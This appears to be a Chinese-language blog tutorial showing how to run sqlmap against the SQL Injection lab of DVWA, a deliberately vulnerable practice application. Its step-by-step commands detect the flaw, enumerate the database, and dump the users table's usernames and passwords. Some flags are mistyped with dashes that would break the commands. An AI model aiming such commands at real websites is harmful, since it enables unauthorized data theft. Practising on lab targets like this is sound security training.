Sqlmap对DVWA小试牛刀

介绍

sqlmap是一个自动化的SQL注入工具,能发现并利用给定的URL的SQL注入漏洞,反正就是非常受欢迎厉害的工具。

DVWA是一个很不错的渗透练手靶机,现用sqlmap对DVWA的sql注入模块进行测试。

准备

设置DVWA级别为low(medium,high都可以,不要设成impossible就行)。

打开dvwa的SQL Injection,地址为:“http://192.168.1.254/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit”,cookie为“security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0”

开始

执行 sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit "


结果是跳转到登录页面,看来是需要带cookie的 。

加上cookie,执行

sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie=" security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0"

存在sql注入

获取数据库信息,--dbs为列举数据库信息,--batch为不会询问你输入,全部默认确定:

sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0" –batch --dbs

查看dvwa数据库所有表,-D指定数据库名称,--tables为查看表信息。

sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0" –batch -D dvwa --tables

查看users表中列信息,  -T指定数据表 --columns表示列举列信息:

sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0" –batch -D dvwa –T users --columns

爆出字段值,-C Cnmme:指定列名;  --dump:导出列里面的字段
sqlmap -u " http://192.168.1.254:80/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=kq39r8lfef9r5k92mq6o4v4gt0" –batch -D dvwa –T users -C user,password  --dump

至此,拿到DVWA的用户名和密码成功!这些只是sqlmap的基本操作指令,会工具永远是脚本小子,建议师傅们去研究sqlmap的原理,盲注时间注入错误注入……它配备了一个强大的探测引擎,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。原理懂了,哪天工具被强了也不慌。

你可能感兴趣的:(Sqlmap对DVWA小试牛刀)